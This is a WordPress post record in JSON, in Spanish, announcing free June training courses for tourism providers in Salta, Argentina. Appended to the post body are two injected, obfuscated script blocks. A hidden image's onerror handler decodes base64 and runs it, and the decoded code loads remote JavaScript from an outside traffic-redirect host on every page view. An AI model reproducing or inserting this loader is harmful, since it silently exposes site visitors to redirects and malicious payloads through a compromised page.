{"id":5262,"date":"2025-06-18T11:55:46","date_gmt":"2025-06-18T14:55:46","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5262"},"modified":"2025-08-13T23:29:43","modified_gmt":"2025-08-14T02:29:43","slug":"cursos-gratuitos-de-capacitacion-destinados-a-prestadores-del-sector-turistico-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5262","title":{"rendered":"Cursos gratuitos de capacitaci\u00f3n destinados a prestadores del sector tur\u00edstico de Salta"},"content":{"rendered":"\n<p><strong><em>En el marco de un trabajo conjunto que el Ministerio viene desarrollando junto al Sector P\u00fablico y Privado, se ofrecer\u00e1n, durante el mes de junio, cursos gratuitos de capacitaci\u00f3n para el sector tur\u00edstico de Salta.<\/em><\/strong><\/p>\n\n\n\n<p>El&nbsp;<strong>Ministerio de Turismo y Deportes<\/strong>&nbsp;en forma conjunta con la C\u00e1mara de Turismo de Salta, C\u00e1mara Hotelera y Gastron\u00f3mica de Salta, AHT, Bureau Salta, durante el mes de junio, dictar\u00e1n cursos gratuitos de capacitaci\u00f3n destinados a prestadores del sector tur\u00edstico de Salta.<\/p>\n\n\n\n<p>Esta iniciativa busca brindar herramientas y conocimientos actualizados a los actores del sector, permitiendo mejorar la calidad del servicio y la competitividad del destino.<\/p>\n\n\n\n<p>Durante el mes junio se dictar\u00e1n las siguientes capacitaciones que tendr\u00e1n modalidades presenciales y virtuales<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>18 de junio Organizaci\u00f3n de Eventos y Congresos, presencial en Cafayate<\/li>\n\n\n\n<li>18, 24, 25, 26 y 30 de junio Fondo de Emprendedores Tur\u00edsticos, capacitaci\u00f3n virtual<\/li>\n\n\n\n<li>24 y 25 de junio Servicio del sal\u00f3n comedor, presencial en Tartagal<\/li>\n\n\n\n<li>26 y 27 de junio Primeros Auxilios presencial en Cachi<\/li>\n\n\n\n<li>30 de junio Gesti\u00f3n del Tiempo \u201cBuen uso de tu energ\u00eda\u201d capacitaci\u00f3n virtual<\/li>\n<\/ul>\n\n\n\n<p>A trav\u00e9s de la Direcci\u00f3n de Formaci\u00f3n y Calidad Tur\u00edstica se pondr\u00e1n a disposici\u00f3n del sector tur\u00edstico, estas propuestas de capacitaci\u00f3n, dise\u00f1adas para el desarrollo profesional, el crecimiento y la sostenibilidad del turismo en toda la provincia.<\/p>\n\n\n\n<p>Para mayor informaci\u00f3n&nbsp;<a href=\"http:\/\/www.turismotecapacita.com\/\">www.turismotecapacita.com<\/a>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco de un trabajo conjunto que el Ministerio viene desarrollando junto al Sector P\u00fablico y Privado, se ofrecer\u00e1n, durante el mes de junio, cursos gratuitos de capacitaci\u00f3n para el sector tur\u00edstico de Salta. El&nbsp;Ministerio de Turismo y Deportes&nbsp;en forma conjunta con la C\u00e1mara de Turismo de Salta, C\u00e1mara Hotelera y Gastron\u00f3mica de Salta, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5263,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11],"tags":[],"class_list":{"0":"post-5262","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5262"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5262"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5262\/revisions"}],"predecessor-version":[{"id":6460,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5262\/revisions\/6460"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5263"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5262"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5262"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5262"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}